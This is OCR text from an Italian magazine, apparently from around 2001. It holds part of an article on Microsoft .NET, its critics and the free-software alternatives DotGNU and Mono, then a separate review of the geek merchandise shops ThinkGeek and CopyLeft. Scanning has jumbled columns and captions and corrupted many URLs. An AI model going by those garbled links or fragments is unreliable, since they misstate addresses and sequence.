denti sul dispositivo, ma “raggiungi- 
bili” attraverso connessioni remote. 
Per fare questo è necessario creare 
una infrastruttura che permetta ai 
vari dispositivi di dialogare, facendosi 


capire in una lingua franca comune a 
tutti, permettere il riconoscimento 
dell'utente, possibilmente senza fasti- 
diose procedure complesse (ma, per 
esempio, attraverso codici personali 
memorizzati in card programmabili) e 
condividere dati e applicazioni. 

Tutto questo promette di diventare 
.NET, in maniera sicura e affidabile 
per gli utenti, “facile” da programma- 
re per gli sviluppatori. 

Tra i tool di programmazione, al 
momento della stesura dell'articolo, è 
disponibile la suite Visual Studio .NET 
in versione beta 2, che gira sotto 
Windows 2000, XP Professional e 
Windows NT 4.0 server. Essa fa parte 
del .NET Framework, che è il substra- 
to di sviluppo per la piattaforma .NET. 
Per quanto riguarda il modello di pro- 
grammazione, grossa enfasi viene 
data ai Web Services. 

Secondo la filosofia Microsoft (si 
veda il sito 
http://msdn.microsoft.com/webservi- 
ces/), un servizio Web è una unità 
applicativa che fornisce dati e servizi 
ad altre applicazioni. Tali applicazioni 
accedono ai servizi Web attraverso 


formati standard sia per i protocolli 
(come Http), che per i dati (usando 
Il'XML come “collante”). In parole 
povere si possono vedere i servizi 
Web sia come applicazioni a se stan- 
ti, che offrono certe funzionalità, ma 
anche come moduli riusabili per le 
proprie applicazioni (si supponga, per 
esempio, che qualcuno abbia imple- 
mentato un Web Service che offre 


rezza che Microsoft potrà offrire, 
visto alcuni clamorosi bachi presenti 
in IIS, e considerando che i vari siste- 
mi operativi Windows sono estrema- 
mente vulnerabili ai virus (si veda 
http://www.oreillynet.com/cs/ 
weblog/view/wlg/719), visti i possibili 
problemi di tutela della privacy di 
Office XP (http://www. linuxvalley.it/ 
news/news.php?ldNews=1165), 


“Secondo la filosofia di Microsoft un servizio 
Web è una unità applicativa che fornisce dati 
e servizi ad altre applicazioni” 


l'autenticazione di una carta di credi- 
to: la nostra applicazione potrà usare 
tale servizio anziché doverselo imple- 
mentare, chiamando un opportuno 
servizio e mandando i dati necessari, 
per poi leggere il risultato che l'appli- 
cazione “remota” ha elaborato). 

In questo senso i servizi Web rappre- 
sentano una estensione del concetto 
di sviluppo per componenti tradiziona- 
le (ora i componenti riusabili non 
stanno più sul computer locale, ma in 
rete). 


Le critiche 


Secondo Steve Anglin (http://www. 
oreillynet.com/cs/weblog/view/wlg/ 
271) un fattore che va tenuto in con- 

siderazione per valutare quanto la 

strategia .NET possa avere successo 

è che, per ora, Microsoft ha una 

bassa incidenza sulle piattaforme ser- 

ver (e i servizi .NET devono girare 
proprio lato server). Egli stima 

che attualmente solo il 12-15% 

del mercato server ha un 
sistema operativo Microsoft, 

e rimangono forti perplessità 
riguardo ad un suo incremen- 
to, dovuto alle basse perfor- 

mance e alla scarsa interope- 

rabilità dei sistemi 

Windows. Per quanto 
riguarda l'intera infra- 

struttura .NET rimangono 

forti perplessità sulla reale sicu- 


oppure in considerazione della notizia 
per cui, usando la versione beta di 
Visual Studio .NET, il sito 
microsoft.com ha dato degli errori 
mostrando ID e password per acce- 
dere a delle risorse “interne” 
(http://techupdate.zdnet.com/techup- 
date/stories/main/0,14179,2818129,0 
O.htmf. Ovviamente i bachi esistono 
in tutti i sistemi operativi (è pratica- 
mente impossibile garantire che un 
prodotto informatico di una certa 
complessità sia privo di possibili pro- 
blemi), e diventa determinante anche 
il fattore umano (il mancato aggiorna- 
mento dei vari prodotti, disattenzione 
nel settare alcuni parametri etc.), ma 
queste notizie non aiutano di certo a 
“fidarsi” di una possibile gestione 
centralizzata di informazioni “sensibi- 
li" da parte di Microsoft. Altre pesanti 
critiche (http://\www.zdnet.com/sp/ 
stories/issue/0,4537,2710948-3,00. 
htm) evidenziano come Microsoft si 
possa avvantaggiare rispetto ad altri 
che vogliono usare la tecnologia, scri- 
vendo delle API non documentate, a 
proprio ed esclusivo vantaggio. ll 
timore che la Microsoft, con questa 
architettura, cerchi di dominare 
Internet, creando uno standard de 
facto e imponendo un prodotto pro- 
prietario (come sta accadendo per il 
browser Internet Explorer), porta ad 
essere diffidenti verso la nuova infra- 
struttura .NET, anche considerando 
che Internet, come accade per tutto il 
software, sì avvantaggia solo quando 
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Print Security Shop 


The DotGNU I Project 


DotGNU, a FreeDevelopers Project, is really a 
meta-project that will consist of between ten and twenty 


software development projects. The main components of 
DotGNU are the DotGNU Platform and the DotGNU 


Virtuel Identities system. 


DotGNU willbe a complete replacement for the NET 
strategy — it will not be a Free Software implementation of 

NET. While ,NET has some very soundideas, problems 
arise with its implementation, especially with the 


Authentication/Authorization systems which are 


FreeDevelopers 


centralized to Microsoft, and with Microsoft’s vision for 
“web services”. DotGNU will use a decentralized 
paradigm: No single company, server or entity will control 
authorization. Secondly DotGNU will emphasize security, it 
will use encryption wherever possible to keep user data 
secure and hidden. (According to the article Risks ofthe 
Passport Single Signon Protocol[1], Microsoft’s approach 
has some fundamental problems in the area of or In 
factit appears that Microsoft is st word. 
usemame for Passport as clear text, 


Software Development Project Proposals 
Wanted! 


Figura 2 


a huge security risk.) 
GNU project 


Home page del sito www.dotgnu.org 


c'è vera concorrenza (a tal proposito 
si veda l'articolo presente sul sito 
http://davenet.userland. 
com/2001/04/08/internetCriticTakesO 
nMicrosoft). 


Il progetto 
DotGNU (.GNU) 


In molti sono concordi nel considerare 
la tecnologia Java la diretta concor- 
rente di .NET (per un articolo compa- 
rativo si veda http://java.oreilly.com/ 
news/farley_0800.htm). A parte la 
“risposta” della Sun con Sun ONE 
(Open Net Iniziative, htto:/www.sun. 
com/software/sunone/, per una rac- 
colta di pareri si veda http.://commu- 
nity.borland.com/article/0,1410, 
26818,00.htm/), anche la comunità 
free software si è mossa per contra- 
stare la strategia Microsoft .NET. In 
particolare, ha preso corpo il progetto 
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DotGNU: esso mira a rimpiazzare 
completamente la strategia .NET di 
Microsoft. In pratica il progetto 
DotGNU accetta le idee da cui è nata 
la “visione” proposta da .NET, ma 
propone soluzioni diverse, come 
diversi saranno i “mattoni” che com- 
porranno la sua struttura. DotGNU in 
realtà è un meta-progetto, nel senso 
che sotto questo nome va un insieme 
di progetti distinti. La scelta di usare 
tanti progetti diversi è dovuta alla 
vastità del lavoro. Basti pensare che 
si conta di attivare tra i dieci e i venti 
progetti. Il sito di riferimento è 
http://www. dotgnu.org (Fugura 2). Chi 
se ne occupa, principalmente, è 
FreeDevelopers (il cui motto è “Una 
ditta di sviluppatori liberi, dagli svilup- 
patori liberi, per un mondo libero”, si 
veda http://freedevelopers.net, Figura 
3). Tra le diversità sostanziali rispetto 
a .NET c'è che l'autenticazione sarà 
totalmente decentralizzata, proprio 


per impedire che una singola azienda 
possa (anche teoricamente) controlla- 
re tutti, aprendo la strada per un pos- 
sibile monopolio, e permettere così 
all'utente finale di scegliere qualcuno 
di cui si fida. Ecco altre caratteristiche 
(DotGNU Platform): 


e |programmi (portable executables) 
creati per la piattaforma .NET gire- 
ranno anche sulla piattaforma 
DotGNU. Tali programmi (che gira- 
no sulla piattaforma .NET) fanno 
uso di un formato bytecode parti- 
colare, chiamato "Intermediate 
Language” (riferito spesso sempli- 
cemente con la sigla IL). Il proget- 
to che si occupa di questo aspetto 
è "DotGnu Portable.NET”. 

e L'architettura DOtGNU, oltre a rico- 
noscere bytecode di tipo IL, rico- 
noscerà anche il bytecode usato 
per le classi Java. Questo ha l'e- 
norme vantaggio di avere già a 
disposizione un numero considere- 
vole di linguaggi di programmazio- 
ne che supportano tale bytecode 
(si veda il sito http://grunge.cs.tu- 
berlin.de/-tolk/vmlanguages.htm)). 

e Attraverso il componente 
"DotGNU Secure Execution Envi- 
ronment" sarà possibile eseguire il 
download di bytecode dalla rete 
(sia esso IL oppure bytecode Java) 
ed eseguirlo in maniera sicura. 

e DotGNU Distributed Execution 
Enviroment: sarà un sistema ope- 
rativo per un “computer distribui- 
to”. Consiste in diverse istanze 
del DotGNU Secure Execution 
Enviroment in esecuzione su 
diversi computer. Tra le varie fea- 
ture, cruciale è quella per cui 
gestirà delle repliche di basi di dati 
tra i computer che compongono il 
“computer distribuito” e si pren- 
derà carico della propagazione 
delle modifiche ai dati. 


Una diversità sostanziale tra DotGnu 
e .NET è che, secondo DotGnu, una 
applicazione creata da un generico 
Application Service Provider può 
essere scaricata in locale ed eseguita 
sul proprio PC, ovvero non si obbliga 
l'utente a farla eseguire in remoto. 


Problemi 
di DotGNU 


Per ora lo stato di avanzamento del 
meta-progetto DotGNU è molto arretra- 
to, ed è difficile fare delle stime su 
quando possa portare ai primi risultati 
concreti. Questo è il suo maggior limite. 
È indubbio che i tempi di introduzione di 
una tecnologia sono cruciali per il suo 
successo. DotGNU rischia di entrare in 
scena quando .NET avrà già conquista- 
no una notevole fetta di potenziali utiliz- 
zatori e fornitori di servizi. Un pericolo, 
evidenziato sul sito di DotGNU, che può 
minare le fondamenta della nuova archi- 
tettura, è quello che i volontari che la 
stanno realizzando vengano in contatto 
con materiale non pubblicato della 
Microsoft, e che usino tali idee, espo- 
nendo così l'architettura a possibili futu- 
re azioni legali da parte di Microsoft, nel 
caso decida di brevettare certe idee (a 
tal proposito si veda l'articolo presente 
sul sito http:;/inuxtoday.com/ 
news_story.php3?ltsn=2001-08-08-001- 
20-NW-CY-MS). 


C'è solo DotGNU? 


Esiste un'altra filosofia: non si vuole 
rimpiazzare l'intera architettura .NET, 
ma fornire gli strumenti gratuiti (sotto 
Linux o altre varianti di Unix) per rea- 
lizzare applicazioni per tale architettu- 
ra. Per questo nasce il progetto 
Mono (sito di riferimento 
http://www.go-mono.com/, progetto 
che vuole fornire una implementazio- 
ne Open Source del development 
Framework .NET. Esso è proposto e 
lanciato dalla Ximian (http://www. 
ximian.com)/, la stessa azienda che 
ha creato l'ambiente desktop 
GNOME. Il progetto Mono mira a for- 
nire un runtime engine compatibile 
con Microsoft CLI (Common 
Language Infrastructure), un compila- 
tore C# (eventualmente anche altri 
linguaggi) e un insieme di librerie di 
classi: tali librerie possono anche 
estendere quelle previste dall'archi- 
tettura .NET. 

Dopo questa implementazione inizia- 
le, il progetto mira a costruire un 


compilatore Just In Time ottimizzato 
ed efficiente. Alcune parti di Mono 
vengono distribuite secondo la licen- 
za GNU LGPL (GNU Library General 
Public License) e alcuni sostengono 
che un limite di tale progetto è pro- 
prio questa licenza, in alcuni casi giu- 
dicata troppo restrittiva (si veda 
http://www.osopinion.com/ 
perl/story/12037.html). Altro progetto 
è .Net OpenSource (http://sourcefor- 
ge.net/ projects/dotnetopensrc/, il 
cui scopo è di costruire una struttura 
comune alle applicazioni (ovvero un 
insieme di “mattoni” software comu- 
ni) da sviluppare sopra l'architettura 
.NET. Per ora sono state identificate 
le seguenti aree di sviluppo: sicurez- 
za, gestione dei log e trattamento 
delle eccezioni, auditing, gestione 
degli utenti/profili. Esistono molti altri 
progetti open source o free software 
che sono in qualche modo correlati 
con .NET. Un ottimo sito di riferimen- 
to è O'Reilly .NET Directory (http:// 


‘freedom’ 
(Thomas 
Crawford, 


ditta libera sarà rilasciato sotto la 


tiranniche del software proprietario, 


Figura 3 


Freedeveloper.net 


® Declaration of Software Freedom 


www.orgillynet.com/pub/g/dotnet_dir. 


Conclusioni 


| vari progetti illustrati in questo articolo 
sono ancora, per la maggior parte, agli 
inizi. È troppo presto per sapere se 
avranno seguito e se riusciranno a com- 
petere con i diretti concorrenti "“com- 
merciali”. È indubbio che, come si evin- 
ce dalla rassegna dei progetti free 
software, esiste un notevole fermento 
di idee e soluzioni. 
Punto cardine di ogni progetto sono le 
collaborazioni di sviluppatori che offrono 
il proprio tempo e le proprie energie alla 
realizzazione di tali progetti. La parteci- 
pazione è libera e aperta a tutti. Per 
chiunque voglia accingersi a contribuire 
consiglio di leggere htto:/Awww.gnu.org/ 
help/help.it.html (ovviamente è d'obbli- 
go, anche successivamente, consultare 
il sito specifico dei vari progetti). 

Ivan Venuti 


FreeDevelopers.net 
Una ditta di sviluppatori liberi 
dagli sviluppatori liberi, 
per un mondo libero 


FreeDevelopers è un'entità democratica per lo sviluppo di software libero. La 
1857) ditta ‘ibera”, probabilmente la prima del suo tipo nel mondo, sarà proprietà degli 
sviluppatori mondiali e sarà da loro diretta su base democratica in una fiducia 
inviolabile per il bene pubblico e la tutela dei cittadini del mondo, Essa pagherà 
tutti gli sviluppatori allavoro sul software libero, e tutti gli sviluppatori riceveranno 
azioni della compagnia e anche opzioni sulle obbligazioni. Tutto il software della 


(GPL) e rimarrà libero 


e/o ‘open source’ per sempre, poiché tutto il software deve essere disponibile a 
tutte le generazioni presenti e future di sviluppatori, in modo che esse possano 
essere la prima linea di difesa a protezione del mondo dalle inevitabili tendenze 
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Sull'onda dell'Open Source e del Free Software sono sorti in 
Internet alcuni siti che vendono gadget e oggettini strambi di tutti | 
generi, collegati comunque al mondo dell'informatica in generale e 
di Linux in particolare. 


S° siete dei programmatori, degli hacker, degli smanettoni, degli 
appassionati di informatica e di computer, se cercate di inseri- 
re la password per far funzionare il microonde, se non fate un soli- 
tario con carte vere da anni, insomma, se siete degli amanti di 
Linux e dell'Open Source in generale, allora siete dei “geek”. E se 
siete dei veri geek dovete andare assolutamente sui siti che ven- 
gono di seguito illustrati, altrimenti non potrete andare in giro con i 


Lo Geek 


La parola geek non la trovate su un sempli- 
ce vocabolario di inglese, ma ve ne servira' 
uno con i termini appartenenti allo slang 
americano attuale. Il vero geek e' un tipo 
strano con una predilezione per tutto cio’ 
che e' tecnologico e informatico, e che 
spende la maggior parte del suo tempo e 
delle sue energie a capire come sono pro- 
gettati i software ed eventualmente modi- 


vari gadget e distintivi che riveleranno la vostra vera natura al 
mondo intero e specialmente ai vostri simili. 


ficarli per migliorarli e ottimizzarli. Gente di 
tal guisa frequenta, oltre a siti come 
Slashdot.org e Freshmeat.net, anche siti di 
commercio elettronico esclusivamente 
dedicati al mondo dei programmatori e 
degli hacker. Tra i piu' famosi troviamo : 
ThinkGeek e Copyleft. Proviamo a visitarli 
e magari a comprare qualche gingillo sim- 
patico che potremo sfoggiare con gli amici 
nei Linux Installation Party o in altre occa- 
sioni. 


Il sito ThinkGeek 


Uno dei siti piu' famosi e frequentati dai 
geek e' sicuramente ThinkGeek. L'indirizzo 
a cui raggiungerlo e' www.thinkgeek.com. 
Il sito e' stato fondato da tre componenti 
di un ISP (Internet Service Provider) del 
Nord della Virginia che hanno trovato in 
Linux uno strumento efficiente e poco 
costoso per far nascere la loro precedente 
impresa. ll sito ThinkGeek e' stato prima 


comprato da Andover.Net che, successiva- 
mente, e' stata acquisita dalla famosa 
societa’ VA Linux. Nel frattempo 
Andover.Net e' diventata OSDN che e' un 
portale di accesso per tutti i siti favoriti 
dalla comunita’ Open Source. Tanto per 
interderci ThinkGeek e' posto a fianco di 
siti come: SourceForge.net, Slashdot.org, 
Freshmeat.net e Linux.com. Il logo del sito 
e' un cervello recante, nella zona sotto- 
stante, lo slogan: “Stuff for Smart 
Masses”; forse a sottolineare il fatto che i 
gadget presenti nel sito sono per gente 
che usa il cervello e anche in maniera 
molto veloce. Il gruppo dei creatori del sito 
e' formato da otto componenti, compreso 
il cane che si chiama “Cisco”. In pratica il 
loro scopo e' quello di vendere alcuni 
oggetti che si rifanno al mondo di Linux e 
dell'Open Source, di Unix e dell'informati- 
ca. Appena entrati sulla home page si puo' 
notare una lista in alto a destra che elenca 
tutti i gadget e le tipologie di oggetti che si 
possono comprare su ThinkGeek. Per dare 
un'idea della vastita' degli acquisti che si 
possono fare le voci presenti sono: Stuff 
You Wear (magliette, polo, cappellini e 
felpe), Fun Stuff (poster, tazze, bicchieri, 
adesivi, spille e altre cose molto stane), 
Caffeine (prodotti a base di caffeina e di 
altri componenti stimolanti), Computing 
(componenti Hardware), Gaming (compo- 
nenti Hardware per giocare), Electronics 
(apparati elettronici), Gadgets (oggettistica 
particolare per i veri Geek), Furniture & 
Stuff (arredamento per ufficio), Books (libri 
di vari tipi, dalla fantascienza ai saggi tratti 
da Slashdot), Clearance (offerte speciali 
per ultime rimanenze di magazzino). Gli 
articoli, come si puo' notare, sono molti e 
per rimanere piu' sull'oggettistica di poco 
costo vediamo la parte dell'abbigliamento, 
che poi e' la piu' interessante e la meno 
rintracciabile su Internet o nei negozi. 


Magliette 
per veri Hacker 


Nella parte dell'abbigliamento si possono 
visitare i vari link divisi per capo di vestia- 
rio. Iniziando dalle magliette si nota un'ul- 
teriore classificazione per tipologia: 
Generic Geek (un must per il tipico Geek), 
Coder/Hacker (adatte agli Hacker e agli 
smanettoni in generale), Ladies (anche il 
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Figura 1 


You are dumD! v. 1. 


Figura 2 


You are dumb! v. 2. 


gentil sesso puo' trovare magliette adatte), 
Unix/Sysadmin (T-shirt per amministratori 
di sistemi Unix), Frustrations (abbigliamen- 
to per chi si vuole sfogare di tutti i proble- 
mi dell'informatica), OSDN Site (magliette 
con i loghi dei siti di OSDN). Una delle 
magliette piu' gettonate dal vero Geek e' 
quella denominata “You are Dumb”. Ha 
riscosso talmente successo che ne sono 
state create due versioni : “You are Dumb 
v.1” (Figura 1) e “You are Dumb v.2” 
(Figura 2). Sono molto simili ed hanno 
entrambe una serie di stringhe binarie che 
possono essere orizzontali o verticali. Il 
nome deriva proprio dal fatto che sulla 
maglietta c'e’ scritto, in formato binario, la 
frase “You are dumb”, che significa: tu sei 
stupido. La cosa che crea ilarita' per que- 
sta maglietta e' che si ipotizza di indossarla 


Figura 3 


I! kernel 2.4 di Linux. 


in una serata con gli amici smanettoni che 
chiederanno subito il significato della strin- 
ga sul davanti e voi, con un cipiglio da 
sapientone, gli potrete rispondere : tu sei 
stupido. Le magliette costano 14,99 dollari 
e possono essere di vari colori. Sempre 
nel campo delle T-shirt si possono trovare 
cose un po' piu' carine e meno Geek, 
come ad esempio il modello “Linux ker- 
nel” (Figura 3) in cui e' stato stampato il 
codice sorgente del kernel 2.4 di Linux 
(Figura 4) intorno ad un pinguino ed alcune 


Figura 4 


Un particolare del codice del kernel 2.4. 


scritte. Si potrebbe dire che Linux e' vera- 
mente un sistema “embedded”. Da non 
perdere per i veri amanti di Linux. Il costo 
e' sempre di 14,99 dollari e il colore e' solo 
blu. Sempre rimanendo nel campo dei Sys 
Admin troviamo la maglietta “Chown 
linux” (Figura 5) che presenta un vero 


Figura 5 


Un vero comando UNIX. 


comando Unix sul petto : chown 
linux:users \/world. Per chi non conosces- 
se la sintassi Unix tale comando serve per 
cambiare il proprietario della directory 
/world. La scritta e' chiaramente simbolica 
e per veri amministratori di sistema poi- 
che' contiene anche il backslash per anda- 
re a capo sulla maglietta e spezzare la riga 
di comando in due parti a causa di proble- 


Figura 6 


La maglietta di Alan Cox. 


mi di spazio di visualizzazione. Una vera 
finezza. Il prezzo e' sempre lo stesso. 

Per passare alle magliette piu' impegnate 
socialmente si puo' citare sicuramente la 
maglietta di Alan Cox disegnata da lui stes- 
so (Figura 6). Per chi non conoscesse Alan 
Cox (Figura 7) si puo' dire molto breve- 


Figura 7 


Alan Cox. 


mente che e' la quintessenza di un hacker 
e l'artefice di maggior parte del lavoro sul 
Networking TCP/IP dell'ultima versione di 
Linux. Inoltre e' coinvolto nello sviluppo di 
svariate parti del kernel: codice multipro- 
cessore, device drivers, secutiry audits, 
video e audio. Insomma, una vera autorita' 
nel settore e la persona di riferimento per i 
prossimi kernel Linux, subito dopo Linus 
Torvald, almeno per ora. La maglietta con 
firma autografa contiene una parodia del 
logo del Patent Office, l'ufficio di Stato 
americano che si occupa di assegnare | 
brevetti sul software. Nel logo si vede 
un'aquila che dilania lo Zio Sam a rappre- 
sentare l'ipocrisia con cui le leggi sui bre- 
vetti software proteggono la liberta’. La 
maglietta serve anche a sostenere la causa 
dell'associazione “League for 
Programming Freedom” (Figura 8) che si 
oppone ai brevetti sul software e al copyri- 
ghts sulle interfacce. Basti pensare al caso 
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Figura 8 


Il logo di League for Programming 
Freedom. 


di Amazon che ha brevettato tramite il 
Patent Office la procedura di acquisto di 
libri tramite un solo click sull'interfaccia 
Web del proprio sito Internet di vendite on- 
line. Il 20% dei proventi della vendita verra' 
devoluto all'associazione in questione. 
Altra maglietta degna di nota per il perso- 
naggio che c'e' dietro, e che l'ha disegna- 
ta, e' quella denominata “Maddog Hall” 
(Figura 9). Il personaggio questa volta e' 


Figura 9 
La maglietta Jon Maddog Hall. 


Jon “maddog” Hall (Figura 10), il direttore 
esecutivo di Linux (R) International, un'as- 
sociazione no-profit dedicata a promuovere 
l'utilizzo di Linux. Prima di questa posizione 
Jon ha lavorato sempre negli ambienti 
Unix, tra cui Digital, ed ha insegnato al 


Figura 10 


jon ‘maddog’ Hall. 
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Computer Science Department 
dell'Hartford State Technical College. 
Attualmente lavora per VA Linux. Anche 
lui, quindi, una persona di spicco del 
mondo Linux, non solo per aver gestito il 
porting di Linux sui sistemi Alpha, ma 
anche per aver insegnato sempre agli stu- 
denti il valore della progettazione di buoni 
algoritmi, della scrittura di codice pulito e 
della vita trascorsa in maniera onorevole. 
In questo caso la maglietta riporta davanti 
un mondo con la scritta Linux sull'equatore 
e una frase intorno che riporta: “World 
Domination Through World Cooperation” 
(Dominazione del mondo attraverso la coo- 
perazione del mondo). Dietro c'e' un pin- 
guino stile druidico con tanto di barba 
lunga, mantello e sfera di cristallo con la 
scritta precedente ripetuta. Un'altra nota 
di rilievo di questa maglietta che costa 
15,99 dollari e' che il 20% dei ricavati 
saranno devoluti al Linux Documentation 
Project (www.linuxdoc.org) . Tale associa- 
zione si occupa di raccogliere in un unico 
punto tutta la documentazione, di qualsiasi 
tipo (HOWTO, Man pages, Guide, ecc...), 
che riguarda GNU/Linux. Un lavoro imma- 
ne e molto importante che merita di esse- 
re appoggiato in tutti i modi, magari anche 
comprando le magliette da ThinkGeek. 


Ce n’e’ per tutti 
I gusti 


Oltre alle magliette il sito ThinkGeek offre, 
come gia' accennato, altri oggetti interes- 
santi. Per esempio i cappellini sono molto 
ben fatti ed a soli 15 dollari si puo' acqui- 
stare un modello con visiera di velluto, pin- 
guino Tux di fronte e la scritta 
“thinkgeek.com” sul retro (Figura 11). 

Per chi cerca un abito piu' consono all'uffi- 


Figura _ 
Cappellino con Tux. 


cio si trova una vasta gamma di polo, 
camicie e cravatte con Tux colorati, loghi 
Debian e BSD. Ad esempio, con soli 
32,99 dollari, si puo' portare a casa una 
polo grigia (Figura 12) con i due caratteri 


Figura 12 
Polo hash-bang. 


che compaiono all'inizio di qualsiasi shell 
script (“#!"). Imperdibile per tutti coloro 
che programmano in script shell o inse- 
gnano shell programming. 

Per uscire dal mondo dell'abbigliamento 
ed entrare in quello dei veri e propri gad- 
get piu' o meno utili si puo' citare il fanta- 
stico portachiavi con pinguino e luce al 
LED per trovare il buco della serrattura 
anche di notte (Figura 13). Controllato da 


Figura 13 


Il portachiavi con la luce. 


micro-processore, tre livelli di luminosita' e 
di lampeggio, batteria al Litio, otto diffe- 
renti colori e resistente all'acqua. Il prezzo 
non e' dei piu' bassi e per ora si attesta 
sui 24,99 dollari. 

Altri gadget interessanti sono: il tool di 
attrezzi multiuso tipo coltellino svizzero 
(Figura 14), l'accendino resistente agli urti 
con custodia in plastica rinforzata (Figura 
15) e il GPS manuale con custodia colora- 
ta. 

L'acquisto avviene chiaramente tutto con 
carta di credito direttamente dal sito Web. 
Le modalita' sono quelle di un classico sito 
di e-commerce in cui si trova il tipico car- 
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Figura 14 


Il coltellino svizzero dei geek. 


rello della spesa virtuale e si inseriscono gli 
oggetti acquistati mano a mano nella lista 
della spesa. Le carte di credito accettate 
sono : Visa, MasterCard, Discover e 


Figura 15 


L’accendino corazzato. 


American Express. Il tempo di spedizione 
al di fuori degli Stati Uniti viene valutato dai 
2 ai 5 giorni lavorativi, ma il costo della 
spedizione, da sommare a quello di vendi- 
ta, dipende dal quantitativo di cose acqui- 
state, dalla loro voluminosita' e dall'indiriz- 
zo di spedizione. Una volta specificato l'in- 
dirizzo dove inviare gli oggetti inseriti nel 
carrello virtuale si potra’ visualizzare anche 
il costo di spedizione. 

Un altro servizio in piu' fornito da 
ThinkGeek e' la creazione di un account, 
con tanto di password. Il ThinkGeek 
account e' molto utile per mantenere indi- 
rizzi di spedizione e di acquisto multipli, 
vedere lo storico degli acquisti effettuati, 
controllare lo stato degli ordini avviati e 
verificare l'esatta posizione del pacco in 
arrivo tramite corriere. 

| sette membri del sito ThinkGeek, oltre ad 
aiutare materialmente con delle donazioni 
le associazioni piu' meritevoli nel campo 


dell'Open Source e del Free Software, 
hanno deciso di inserire degli oggetti i cui 
ricavati andranno alle vittime della strage di 
New York. Inoltre si sentono in dovere di 
diffondere la cultura underground della 
comunita’ di Internet e sperano, con la loro 
opera, di portare qualche nuovo geek sulla 
via dell'Open e del Free software. 


Il sito CopyLeft 


Un altro sito di grande interesse per i con- 
sumatori anomali di feticci tecno-cyber- 
punk e' sicuramente il sito di CopyLeft 
(www.copyleft.net) . CopyLeft e' un sito 
nato nel 1998 che supporta il mondo del 
Free Software e dell'Open Source. La 
veste grafica e' cambiata negli anni e gli 
articoli venduti sono aumentati nel tempo, 
migliorando anche le modalita’ di acquisto 
e di controllo. Le routine di e-commerce 
sono interamente scritte in Perl e verranno 
rese disponibili non appena sara' pronta la 
documentazione. Gli articoli, originariamen- 
te collegati solo alla figura del pinguino e al 
Free Software, si sono allargati a marchi 
come: Debian, Segfault.org, Register, il 
progetto Gnome, il progetto G/MP i libri 
O'Really e Free Software Foundation 
GNU. Anche i tipi di oggetti sono aumen- 
tati dal solo abbigliamento ai gadget piu' 
strani, gli adesivi, i frisbee, le polo e, addi- 
rittura, le mentine del pinguino. 

Sulla home page di CopyLeft campeggia, 
su uno sfondo blu rilassante, il logo del 
sito che rappresenta un pinguino che 
regge un marchio con la C rovesciata den- 
tro ad un cerchio sul becco, come se 
fosse un giocoliere. Tale simbolo non 
dovrebbe essere nuovo ai linuxiani piu' 
oltranzisti poiche' simboleggia proprio il 
copyleft, cioe' il diritto d'autore del Free 
Software che si contrappone al copyright, 
cosi’ come ideato da Richard Stallman 
nella GPL (General Public License). Non 
per niente il logo del copyleft e' lo stesso 
del copyright tranne che e' specchiato, a 
significare l'antitesi dei due diritti che viene 
evidenziata anche nel nome stesso. 
Anche qui si vende di tutto, specialmente 
per i geek: T-shirt, polo, cappellini, cravat- 
te, libri, software, adesivi e altro ancora. 
Uno degli articoli da non perdere e' sicura- 
mente rappresentato dalle due cravatte in 
vendita. Un modello con dei piccoli Tux su 


Figura 16 


La cravatta con i pinguini danzanti. 


sfondo verde e l'altro con i pinguini dan- 
zanti su sfondo rosso (Figura 16), una vera 
sciccheria. Da comprare assolutamente se 
si deve vestire in modo professionale per 
riunioni di lavoro, senza perdere la propria 
individualita' di hacker del Free Software e 
di utilizzatore di Linux. Il costo, scontato 
del 25%, e' di 22,50 dollari ma il prodotto 


Figura 17 


La maglietta con il logo di Apache. 


e' in pura seta. Le polo sono semplici ed 
eleganti poiche' non recano molte scritte 
ed ingombranti loghi, ma solo un piccolo 
simbolo dell'associazione o del prodotto 
sponsorizzato. Molto bella e', ad esempio, 
la maglietta con il logo di Apache (Figura 
17), il Web Server Open Source piu' utiliz- 
zato nei sistemi Linux e su Internet. La 
polo costa 26 dollari e ne esistono varie 
taglie e vari colori. Attualmente non e' pre- 
sente nelle offerte, ma le scorte di magaz- 
zino di CopyLeft vengono aggiornate molto 
velocemente, quindi basta riprovare dopo 


qualche giorno per trovare sicuramente 
l'articolo desiderato. Nella sezione Special 
ci sono i residui di magazzino, gli articoli 
meno venduti e quelli piu' interessanti. 
Alcuni sono offerti a prezzi molto vantag- 
giosi. Da notare le magliette a meno di 10 
dollari e i libri a soli 5 dollari. 


Pi 5 d " 
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piu’ guadagni 

L'acquisto puo' essere effetuato, in manie- 
ra analoga al sito precedente, tramite carta 
di credito con un carello virtuale. La diffe- 
renza sostanziale forse sta nel tipo di tra- 
sporto scelto per il pezzo comperato dal 
cliente. CopyLeft utilizza il trasporto posta- 
le americano e questo, di conseguenza, 
comporta un minor costo di trasporto ma 
un minor monitoraggio del pacco che deve 
arrivare a casa, oltre che una probabile len- 
tezza, specie per viaggi cosi' lunghi. Come 
su ThinkGeek, ma in maniera molto piu' 
impegnata, i proventi delle vendite servo- 
no a sovvenzionare i progetti del Free 
Software e dell'Open Source, oltre che 
tutte le associazioni che si prodigano nella 
diffusione, divulgazione e consolidamento 
della filosofia Open Source. In realta’, a dif- 
ferenza del sito precedente, la principale 
missione di CopyLeft e' quella di sostene- 
re le associazioni e i progetti della comuni- 
ta' Internet, senza di essa non avrebbe 
neanche senso la sua stessa esistenza. 

Da quando e' apparsa sul Web Copyleft ha 
donato almeno 90000 dollari ai progetti 
Open Source e Free Software. Tra i mag- 
giori beneficiari di tanta generosita' trovia- 
mo: Slashdot con 27728 dollari, Free 
Software Foundation con 21710 dollari, 
EFF con 12000 dollari e Debian con 6736 
dollari. | soci di CopyLeft tengono a preci- 
sare che le donazioni a Slashdot e 
Freshmeat sono state effettuate prima 
della loro entrata in borsa (IPO). 

Ad ogni articolo offerto e' associata una 
didascalia che notifica l'associazione o il 
progetto a cui e' devoluta una percentuale 
del prezzo di acquisto in dollari. Dunque 
comperare i gadget e l'abbigliamento di 
CopyLeft non e' solo un modo per ottene- 
re oggetti strani e molto legati al mondo 
del pinguino, ma anche un sistema di sov- 
venzione e sostegno per tutti quei soggetti 
che ci regalano delle perle di software 


free. E' un metodo diretto e veloce da 
parte delle associazioni Open Source per 
ottenere fondi che altrimenti non potreb- 
bero raccogliere. Non bisogna dimenticare 
che dietro a gioielli di software come 
GIMP e Apache esistono decine di pro- 
grammatori e hacker che non ricevono 
alcun contributo per il codice scritto, a 
meno che non riescano ad avviare il mec- 
canismo della consulenza esterna su pro- 
getti privati che abbiano scelto del Free 
Software per i propri sistemi informativi. 
Si possono aiutare in vari modi i progetti 
